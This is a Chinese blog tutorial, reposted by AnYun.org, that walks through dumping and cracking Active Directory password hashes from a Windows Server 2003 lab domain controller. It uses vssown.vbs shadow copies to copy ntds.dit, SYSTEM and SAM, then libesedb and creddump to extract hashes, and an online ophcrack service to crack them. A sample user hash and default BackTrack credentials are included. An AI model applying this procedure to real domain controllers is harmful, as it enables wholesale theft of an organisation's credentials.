安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 网络安全 > 离线破解win2003 AD域账号密码

离线破解win2003 AD域账号密码

时间:2014-08-13来源:backlion.com 作者:backlion.com点击:
一 实验环境:windows server2003,域环境 搭建方法很简单,百度搜搜。 新建一个域用户xiaocai,密码设为 123abcABC

一 实验环境:windows server2003,域环境 //copyright AnYun.ORG

搭建方法很简单,百度搜搜。 //安云网,anyun.org

新建一个域用户xiaocai,密码设为 123abcABC //安云网,anyun.org

1

//ANYUN.ORG


//copyright AnYun.ORG

2

//copyright AnYun.ORG


//内容来自安云网

二 win2003下提取文件 //ANYUN.ORG


//安云网咨询系统

1、将vssown.vbs拷到域服务器上,比如拷到域服务器的桌面。

//本文来自安云网

2、以管理员身份运行cmd,执行以下命名: //ANYUN.ORG

cd 桌面

//copyright AnYun.ORG

cscript //nologo vssown.vbs /start 启用 //ANYUN.ORG

cscript //nologo vssown.vbs /status 查看运行状态

//copyright AnYun.ORG

cscript //nologo vssown.vbs /create C 创建快照 //本文来自安云网

3 //安云网,anyun.org


//内容来自AnYun.ORG


//内容来自安云网

cscript //nologo vssown.vbs /list 查看创建的快照信息

//安云网,anyun.org


//本文来自安云网

4

//内容来自安云网


//copyright AnYun.ORG

这里可以看到系统内部的路径,将两个ntds.dit和SYSTEM文件复制到桌面,这里的[X]用5代替。

//内容来自AnYun.ORG


//ANYUN.ORG

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit //ANYUN.ORG

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM //安云网咨询系统

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM //安云网,anyun.org


//ANYUN.ORG

5 //copyright AnYun.ORG


//安云网咨询系统

提取就文件就结束了,这里我尝试的时候经常失败。有空我再找找资料分析一下到底是什么造成。 //安云网咨询系统


//安云网咨询系统

再把快照删除(这步可选,建议删除掉)

//安云网,anyun.org

cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D} //安云网,anyun.org

6

//内容来自安云网

把这3个生成的文件复制出来。 //内容来自安云网


//ANYUN.ORG


//ANYUN.ORG

三 提取HASH //copyright AnYun.ORG


//内容来自安云网

先下载工具,BT5,我是用下面这个虚拟机镜相 //安云网咨询系统

VMWARE镜像32位:http://ftp.halifax.rwth-aachen.de/backtrack/BT5R1-GNOME-VM-32.7z

//内容来自安云网

登陆密码: root/toor //安云网咨询系统


//本文来自安云网

开放ssh服务:(开启服务后可以用Secure CRT进行访问,方便传文件)

//内容来自安云网

ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key

//安云网,anyun.org

ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key //ANYUN.ORG

sshd-generate

//本文来自安云网

/etc/init.d/ssh restart

//安云网咨询系统

7

//copyright AnYun.ORG

略掉一个截图 //copyright AnYun.ORG

8 //内容来自安云网

用ifconfig查看IP //安云网咨询系统

9 //内容来自安云网


//安云网,anyun.org

接着用Secure CRT访问,

//内容来自AnYun.ORG

   10 //copyright AnYun.ORG


//内容来自AnYun.ORG

   11 //安云网咨询系统

按ALT+P 开启SFTP,把文件传到/tmp下

//安云网,anyun.org

cd /tmp

//copyright AnYun.ORG

put SYSTEM ntds.dit ntds_dump_hash.zip

//安云网咨询系统

12 //copyright AnYun.ORG


//本文来自安云网

切换到BT5系统标签 //安云网咨询系统

cd /tmp //内容来自安云网

ls

//内容来自AnYun.ORG

13

//安云网,anyun.org

#解压 ntds_dump_hash.zip

//安云网咨询系统

unzip ntds_dump_hash.zip

//内容来自AnYun.ORG


//安云网咨询系统

#编译libesedb //本文来自安云网

cd libesedb

//内容来自安云网

chmod +x configure //安云网,anyun.org

./configure && make

//内容来自安云网


//内容来自安云网

#解释数据文件ntds.dit

//本文来自安云网

cd esedbtools

//ANYUN.ORG

./esedbdumphash ../../ntds.dit //安云网咨询系统


//copyright AnYun.ORG

#提取hash //安云网咨询系统

cd ../../creddump/

//内容来自安云网

python ./dsdump.py ../SYSTEM ../libesedb/esedbtools/ntds.dit.export/datatable //内容来自安云网


//安云网咨询系统

提取出来了,找到, //内容来自安云网

xiaocai:1109:8A79528CCD6E0DBFFCD6B8DB0F458C37:3B0DE00581A39A49946206E0998B7DF7:::

//安云网,anyun.org


//安云网咨询系统

14

//copyright AnYun.ORG


//ANYUN.ORG

四 破解hash

//安云网,anyun.org


//内容来自AnYun.ORG

破解hash方法很多,这里采用网站破解。把加粗的那部分放到网站上去破解:http://www.objectif-securite.ch/en/ophcrack.php

//内容来自安云网

15 //内容来自安云网


//内容来自安云网


//内容来自AnYun.ORG

补充:之前有碰到域数据库文件ntds.dit不是存放在默认的c:\windows\ntds\下,比如存放在e:\ntds\下

//内容来自AnYun.ORG

这时情如果按上面的方法提取,会提示”系统找不到指定路径。

//安云网,anyun.org

16

//ANYUN.ORG


//copyright AnYun.ORG

这里建议创建2个快照,一个创建在C盘,一个创建在E盘(ntds.dit所以的盘)。

//本文来自安云网

cscript //nologo vssown.vbs /create C 创建快照,为了提取system //ANYUN.ORG

cscript //nologo vssown.vbs /create E 创建快照,为了提取ntds.dit //安云网咨询系统


//内容来自AnYun.ORG

用对应的方法把这2个文件copy出来。

//内容来自安云网

快照8是 C盘的

//本文来自安云网

17

//内容来自安云网


//安云网,anyun.org


//安云网,anyun.org

快照7是 E盘的

//内容来自安云网

18 //本文来自安云网


//内容来自安云网


//本文来自安云网

这样就可以顺利地复制出2个文件

//内容来自AnYun.ORG

19 //安云网,anyun.org


//ANYUN.ORG

20 //本文来自安云网


//ANYUN.ORG

这里多注意ntds.dit的路径;system还是默认的路径

//本文来自安云网

21

//安云网咨询系统


//安云网咨询系统


//ANYUN.ORG


//安云网咨询系统

这里还要补充一些知识,虽然不够全面,但是也告诉我们一些域服务器的重要信息。我是从下面的url了解到。

//copyright AnYun.ORG

http://blogs.technet.com/b/csstwplatform/archive/2008/10/09/ad-ntds-dit.aspx //ANYUN.ORG


//ANYUN.ORG

22

//内容来自AnYun.ORG


//内容来自AnYun.ORG

从上面我们可以看域数据库在注册表中的重要参数,ntds.dit存放的位置是可以修改。这些参数知道对前面的路径的理解有很大的帮助。

//内容来自AnYun.ORG

成功提取system和ntds.dit两个文件后,按前面第三步起的方法再破解。 //本文来自安云网


//内容来自AnYun.ORG

23

//内容来自安云网


//内容来自AnYun.ORG

这里再秀一下hash,xiaocai是在默认路径下时建立的账号;mimei是把域数据库移动到E:\ntds\后建立的账号。

//内容来自安云网

(来源  http://www.backlion.com/%E7%A6%BB%E7%BA%BF%E7%A0%B4%E8%A7%A3win2003-ad%E5%9F%9F%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81/ )

//安云网咨询系统

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容